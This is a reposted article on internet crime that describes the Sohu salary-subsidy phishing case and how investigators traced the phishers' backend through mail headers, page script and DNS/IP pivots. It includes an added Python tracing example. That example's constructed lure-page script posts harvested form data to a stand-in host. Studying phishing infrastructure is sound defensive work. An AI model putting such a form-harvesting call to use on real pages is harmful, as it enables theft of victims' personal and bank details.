Most people have heard the term "Internet black and grey industry", but black industry is not the same thing as grey industry; there is a real difference between the two.
The network black and grey industry covers both. In "black industry", "black" refers mainly to acts that the law explicitly defines as illegal or criminal. Grey industry is different: it refers to acts that legislation has not clearly addressed, acts that hover at the edge of crime without constituting one, such as malicious registration or the buying and selling of accounts.
The network black and grey industry refers to network crimes committed with the help of network platforms and technology. Such crimes are organized, purposeful, divided into roles and large in scale, and they include both the black industry and the grey industry.

Simply put, those who use the Internet to commit crimes are the "black industry", and those who provide technical support and assistance for cybercrime are the "grey industry".
The main types of network black and grey industry include, but are not limited to, phishing websites, hacker extortion, Trojans, telecom fraud and e-mail fraud. Behind the highly developed Internet lie many hidden dangers and regulatory blind spots: because new network crime differs from traditional crime, applying existing criminal charges is difficult; some "black and grey industries" were born with the Internet and spread along with it; and there are further problems in e-commerce, such as hacker attacks, information theft and account theft.
Some time ago, the topic # All Sohu employees hit by salary-subsidy fraud # trended on Weibo. According to a chat record circulating online, on May 18 all Sohu employees received an e-mail from the "Sohu Finance Department" titled "Notice of May employee salary subsidy". The chat record says that many employees were cheated and the balances of their payroll cards were transferred out; Zhang Chaoyang subsequently responded to the incident in a blog post. This incident is a textbook case of the Internet black and grey industry: e-mail fraud carried out after stealing an account and its password.

How did this fraud happen? Let's take a look.
The black-industry organization first obtained a high-privilege account on the target mail server through a network attack. It then sent, in the name of the finance department, an e-mail titled "Notice on Issuing the Latest Salary Subsidy". The body of the e-mail was the subsidy notice itself with a QR code image embedded in the text, inducing recipients to scan it. The attachment had the same content as the body and carried no viruses or executable files.

When the recipient scans the QR code, it redirects to a page impersonating UnionPay. This page induces users to enter personal information and bank card details; the main purpose of the phishing site is to obtain the user's name, ID number, mobile phone number, bank card number and similar data.
After obtaining the sensitive information entered by the user, the page transfers it through an API interface to a management backend, so that the black-industry personnel can carry out targeted fraud.

After the event, a domestic security team carried out a.
First, analysis of the e-mail showed that it had been sent through Outlook, and that the source IP was likewise an Outlook IP.

Looking up HK0PR02MB2497.APCPRD02.PROD.OUTLOOK.COM shows that this IP belongs to data-center (hosting) traffic from the United States; no further information about the e-mail could be obtained from this hop.


Next, examination of the phishing page's front-end JS showed that the page calls an API interface whose domain is api.klh****.***. Querying that api domain gave the IP 47.5*.*.***.

A reverse lookup of 47.5*.*.*** associated it with more than 200 domains, so CNAME analysis was used to narrow them down: the only domains actually bound to the real IP turned out to be api.klh***.*** and new.****.***. Logging in to this domain revealed that it was the general management backend of the black-industry organization.
In this way, through domain name resolution and IP tracing, the backend of the black industry was found and a large amount of evidence was obtained.
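The tracing steps just described (reading the mail's relay hops, pulling the API host out of the lure page's script, then pivoting from that host's IP to the domains really bound to it) can be rehearsed offline. The following is an added example written for this article, not code from the security team that did the analysis. Every IP, domain, mail header and script line in it is constructed; the article's own indicators are redacted (api.klh****.***, 47.5*.*.***), so none is reused except the Outlook relay hostname the article quotes. The `DNS` and `REVERSE` tables stand in for the resolver and reverse/passive-DNS queries an investigator would make against live infrastructure.

```python
"""Tracing a phishing campaign's infrastructure: mail hops, lure-page script
hosts, and a DNS pivot that separates domains truly bound to an IP from noise.

Added example, not code from the original article.  Raw mail, script snippet,
zone data and all IPs are constructed for illustration.
"""
import re
from email import message_from_string
from typing import Dict, List, Tuple

# Constructed raw message, newest Received header first, as a receiving server
# records a mail relayed through an Outlook mailbox server.
RAW_MAIL = """\
Received: from HK0PR02MB2497.APCPRD02.PROD.OUTLOOK.COM (203.0.113.10) by
 mx.example-corp.test with ESMTPS; Wed, 18 May 2022 09:12:01 +0000
Received: from webmail-client.example.test (198.51.100.7) by
 HK0PR02MB2497.APCPRD02.PROD.OUTLOOK.COM with HTTP; Wed, 18 May 2022 09:11:58 +0000
From: "Finance Department" <finance@example-corp.test>
Subject: Notice of May employee salary subsidy

Scan the QR code below to claim your subsidy.
"""

# Constructed front-end script of the lure page: it posts the harvested form to
# an API host, which becomes the pivot point for the DNS work below.
PAGE_JS = """
fetch("https://api.klh-example.test/v1/submit", {method: "POST", body: JSON.stringify(form)});
var logo = "https://cdn.shared-host.test/unionpay-logo.png";
"""

# Constructed zone data (name -> (type, value)) standing in for live resolver
# answers, plus a reverse/passive-DNS table of every domain ever seen on the IP.
# Most reverse hits are stale or unrelated; only two still bind to the IP.
DNS: Dict[str, Tuple[str, str]] = {
    "api.klh-example.test": ("CNAME", "edge.klh-example.test"),
    "edge.klh-example.test": ("A", "47.50.1.100"),
    "new.panel-example.test": ("A", "47.50.1.100"),
    "shop.stale-example.test": ("A", "198.51.100.20"),        # moved elsewhere
    "blog.stale-example.test": ("CNAME", "shop.stale-example.test"),
    "loop-a.example.test": ("CNAME", "loop-b.example.test"),
    "loop-b.example.test": ("CNAME", "loop-a.example.test"),  # broken chain
}
REVERSE: Dict[str, List[str]] = {
    "47.50.1.100": ["shop.stale-example.test", "api.klh-example.test",
                    "blog.stale-example.test", "loop-a.example.test",
                    "new.panel-example.test"],
}

IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def received_hops(raw: str) -> List[Tuple[str, str]]:
    """Return (sending host, IP) for each Received header, newest hop first."""
    msg = message_from_string(raw)
    hops = []
    for value in msg.get_all("Received", []):
        flat = " ".join(value.split())            # unfold continuation lines
        host = re.match(r"from (\S+)", flat)
        ip = IP_RE.search(flat)
        hops.append((host.group(1) if host else "", ip.group(1) if ip else ""))
    return hops


def originating_ip(raw: str) -> str:
    """IP of the earliest hop recorded in the headers.  Hops written by the
    receiving side and by a known provider relay are reliable; anything the
    sender could have added below them may be forged."""
    hops = received_hops(raw)
    return hops[-1][1] if hops else ""


def script_hosts(js: str) -> List[str]:
    """Hosts contacted by a page's front-end script (candidate API endpoints)."""
    return sorted(set(URL_HOST_RE.findall(js)))


def resolve(name: str, max_depth: int = 8) -> Tuple[str, List[str]]:
    """Follow the CNAME chain from name to its A record.
    Returns (ip, chain); ip is '' if the chain dangles, loops or is too deep."""
    chain = [name]
    for _ in range(max_depth):
        rec = DNS.get(chain[-1])
        if rec is None:
            return "", chain
        rtype, value = rec
        if rtype == "A":
            return value, chain
        if value in chain:                        # CNAME loop
            return "", chain
        chain.append(value)
    return "", chain


def bound_domains(ip: str) -> List[str]:
    """Of all domains a reverse/passive-DNS lookup associates with ip, keep only
    those whose live CNAME chain still terminates on ip."""
    return sorted(d for d in REVERSE.get(ip, []) if resolve(d)[0] == ip)


if __name__ == "__main__":
    print("mail hops  :", received_hops(RAW_MAIL))
    print("origin IP  :", originating_ip(RAW_MAIL))
    for host in script_hosts(PAGE_JS):
        ip, chain = resolve(host)
        print("script host:", " -> ".join(chain), "=>", ip or "unresolved")
        if ip:
            print("bound to", ip, ":", bound_domains(ip))
```

The filter in `bound_domains` is what turns a reverse lookup full of stale or shared-hosting entries into the short list the article describes: a domain counts only if its current CNAME chain ends on the IP under investigation, and loops or dangling chains are simply dropped rather than crashing the pivot.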
The black and grey industry uses the virtual space of the Internet and related technology to commit crimes. Especially as network platforms of every kind keep emerging, perpetrators exploit the anonymity of these platforms to carry out criminal activity, and IP tracing is an effective means of tracking suspects that has been widely used in Internet investigations.
The development and spread of the Internet have brought great convenience to people's lives, and traditional ways of living have changed greatly with its help. Online shopping, online payment, social networking and online entertainment all bring convenience, but all kinds of cybercrime have appeared alongside them. In particular, the Internet black and grey industry has caused huge property losses to the public and disrupted social order.
As the black and grey industry keeps developing and spreading, new forms of it will appear in the future, and the state has launched special crackdowns at every level. Governing the Internet black and grey industry cannot rely on legal means alone; society must also strengthen coordinated governance, dig deep into the black and grey industrial chain, and strike at the root of the crime.
Original site copyright notice
This article was created by [InfoQ]; please include a link to the original when reposting. Thank you.
https://yzsam.com/2022/161/202206101113160125.html